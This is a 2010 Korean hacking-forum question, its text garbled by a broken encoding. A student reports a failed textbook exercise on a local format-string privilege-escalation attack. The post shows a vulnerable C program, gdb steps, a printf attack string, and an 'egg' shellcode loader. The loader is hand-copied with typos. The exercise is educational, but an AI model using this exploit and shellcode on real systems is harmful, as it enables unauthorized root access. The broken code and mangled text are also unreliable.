http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1448 [º¹»ç]
´ëÇлýÀε¥¿ä ±³¼ö´ÔÀÌ °úÁ¦¸¦ ³»Á̴ּµ¥ ´ë°¡¸® »È°¡Áö°Ô Çصµ ¾ÈµÇ³×¿ä ¤Ð¤Ð
ÄÚµùÀº 2°³Çߴµ¥¿ä ¼Ò½º´Â ¾Æ·¡¿¡ Àû°Ú½À´Ï´Ù
gdb bugfile (bugfile ÄÚµùÆÄÀÏ) ¼Ò½º´Â ¾Æ·¡
disass main
main+3 À»Ã£¾Æ¼ ÀûÀ½ (0x080483d3 )
break *0x08048657
run Ä¡¸é (no debugging symbols found) ¶ó´Â ±Û¶ä
info reg Ä¡¸é $ebp 0xbff3a88 °ª³ª¿È
x/12 $ebp Ä¡¸é À§¿¡²¨¶û°°Àº 0xbff3a88 °ª³ª¿È
./egg ó¼ °ª»ý¼ºÇÔ ( egg ÄÚµùÆÄÀÏ) ¼Ò½º´Â ¾Æ·¡
0xbff085e8 °ª »ý¼º
¿©±â¼ 1bff0 À̶û 85e8À̶ó´Â °ªÀ» ³ª´©¾î¼ 16Áø¼ö¿¡¼ 10Áø¼ö·Î º¯È¯
114672 ¿Í 34280 À̶ó´Â °ªÀ¸·Î ´ï
¿©±â¼ 34280Àº ¹®ÀÚ 16°³°¡ µé¾î°¥°ÍÀ̹ǷΠ16À»» (34264)
³ª¿Â¼ýÀÚ³¢¸® »©¼ 114672 - 34280 = (80392) °ªÀ¸·Î´ï
ÀÌÁ¦ °ø°ÝÄڵ带 Â¥¼ (printf "\x41\x41\x41\x41\x6c\xf3\xff\xbf\41\x41\x41\x41\xfe\xf3\xff\xbf%%34264d%%hn%%80392d%%hn"; cat) | ./bugfile
À̶ó°í ÀÛ¼º
½ÇÇà ÇÏ¸é ¼¼±×¸ÕÅ×ÀÌ¼Ç ¿À·ù ¶ó°í ¶ä ·çÆ®±ÇÇÑ Ãëµæµµ ½ÇÆÐ ¤Ð¤Ð Ã¥´ë·Î ´Ù Çߴµ¥ ¿Ö ¾ÈµÇ´Â°ÅÁÒ ±³Àç´Â (itcookbook Á¤º¸º¸¾È°³·Ð°ú ½Ç½À ½Ã½ºÅÛÇØÅ·°ú º¸¾ÈÆí ÀÔ´Ï´Ù)
¾Æ ÁøÂ¥ ¹¹°¡ À߸øµÈÁö ¸ð¸£°Ú³×¿ä µµ¿ÍÁÖ¼¼¿ä ¤Ð¤Ð
(¼Ò½º)
bugfile.c
#include <stdio.h>
main() {
int i =0;
char buf[ 64];
memset (buf, 0, 64);
read(0, buf, 64);
printf(buf);
}
egg.c (Àå¹®ÀÔ´Ï´Ù ¼ÕÀ¸·Î Ãļ ¿ÀŸ°¡ÀÖÀ»¼öµµ)
#include <stdlib.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80"
"\x55\x89\xe5\xeb\x1f\x5e\x89\x76\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89"
"\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"
"\x00\xc9\xc3\x90/bin/sh";
unnsigned long get_esp (void) {
__asm__("movl %esp, %eax")
main (int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
if (argc > 1) bsize = atoi (argv[ 1]);
if (argc > 2) offset = atoi (argv[ 2]);
if (argc > 3) eggsize = atoi (argv[ 3]);
if (!(buff = malloc(bsize))) {
printf ("can't allocate memory.\n");
exit (0);
}
if (!(egg = malloc(eggsize))) {
printf("can't allocate memory.\n");
exit (0);
}
addr = get_esp() - offset;
printf("using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++_ = addr;
ptr = egg;
for (i = 0; i < eggsize - strlen (shellcode) - 1; i++)
* (ptr++) = NOP;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[ i];
buff[bsize - 1] = '\0';
egg[ eggsize - 1] = '\0';
memcpy (egg, "EGG=", 4);
putenv (egg);
memcpy (buff, "RET=", 4);
putenv (buff);
system("/bin/bash");
}
|
Hit : 4433 Date : 2010/12/07 04:29
|